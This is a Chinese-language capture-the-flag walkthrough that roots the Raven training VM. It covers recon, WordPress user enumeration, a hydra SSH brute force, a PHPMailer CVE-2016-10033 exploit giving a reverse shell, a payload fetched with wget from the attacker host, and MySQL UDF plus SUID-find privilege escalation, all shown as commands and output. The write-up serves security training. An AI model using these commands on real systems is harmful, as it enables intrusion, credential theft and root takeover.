攻击机 ip:192.168.195.133
靶机 ip:192.168.195.139
- 探测存活主机
root@kali:~# arp-scan -l
- 端口探测(
nmap为例)
root@kali:~# nmap -sV -p- 192.168.195.139
- 使用
Dirbuster工具进行敏感目录扫描
- 方法一
3.png
其中通过访问vendor目录发现PHPMailerAutoload.php文件,查询后发现CVE-2016-10033是PHPMailer中存在的高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。(见方法二)
通过访问
service.html查看源代码发现flag
- 由于发现
wordpress目录,所以使用Wpscan扫描
Wpscan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等
root@kali:~# wpscan --url "http://192.168.195.139/wordpress" -e u vp
-e枚举方式
uid 为1-10的用户名
vp扫描脆弱插件
探测到两个用户名,如图
- 使用
hydra对其进行SSH爆破
root@kali:~# hydra -l michael -P '/root/Desktop/常用密码.dict' -V -o ssh.log 192.168.195.139 ssh
破解出密码:“michael”(em...我其实没破解出来)
- 成功登录
ssh
root@kali:~#ssh michael@192.168.195.139
查询到 /var/www目录下存放flag2.txt
michael@Raven:/var/www$ cat flag2.txt
在wordpress的wp_config.php里找到mysql的账户密码
michael@Raven:/var/www/html/wordpress$ vi wp-config.php
- 上传一个大马并访问
通过连接mysql查询到flag3flag4
10.png
- 提权
对steven的hash值进行md5解密得到pink84
12.png
13.png
由python -c ’import pty; pty.spawn("/bin/sh")’得到一个可以交互的shell,在有root密码的前提下可以su,steven是root账户
14.png
成功提权至root账户
- 方法二
利用PHPMailer命令执行以及mysql udf提权
使用kali搜索漏洞有关的代码库
searchspolit phpmailer
探测到
PHPMailer版本为5.2.16,这里使用pythohn远程代码执行脚本
拷贝脚本到本地
cp /usr/share/exploitdb/platforms/php/webapps/40974.py /
查看并修改相关参数
编译运行代码,成功运行后将在文件根目录下生成 wcute.php文件
本地开启监听,wcute.php 文件运行后shell成功反弹
使用python -c ’import pty; pty.spawn("/bin/bash")’得到一个可以交互的shell
在wordpress的wp_config.php里找到mysql的账户密码
michael@Raven:/var/www/html/wordpress$ vi wp-config.php
使用
netstat -a发现mysql服务启动
查看进程发现
mysql是以root权限运行的,此时想到了mysql提权,这里以udf提权为例
查询到mysql udf提权exp编号为1518,拷贝exp到本地/var/www/html
cp /usr...... /var/www/html
编译生成动态链接库文件,方便上传至靶机
使用wget上传至靶机(主机开启Apache服务)
靶机连接mysql开始进行提权操作
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.22 sec)
mysql> use wordpress
use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.43 sec)
mysql> insert into foo values(load_file('/var/www/html/1518.so'));
insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.10 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.06 sec)
mysql> create function do_system returns integer soname '1518.so';
create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.10 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------+----------+
| name | ret | dl | type |
+-----------+-----+---------+----------+
| do_system | 2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)
mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.02 sec)
mysql> quit
quit
Bye
www-data@Raven:/var/www/html$ touch foo
touch foo
www-data@Raven:/var/www/html$ find foo -exec 'whoami' \;
find foo -exec 'whoami' \;
root
www-data@Raven:/var/www/html$ find foo -exec '/bin/sh' \;
find foo -exec '/bin/sh' \;
# whoami
whoami
root
# pwd
pwd
/var/www/html
# cd /root
cd /root
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
成功提权
参考链接:
https://www.anquanke.com/post/id/163996
https://www.cnblogs.com/bmjoker/p/10034001.html
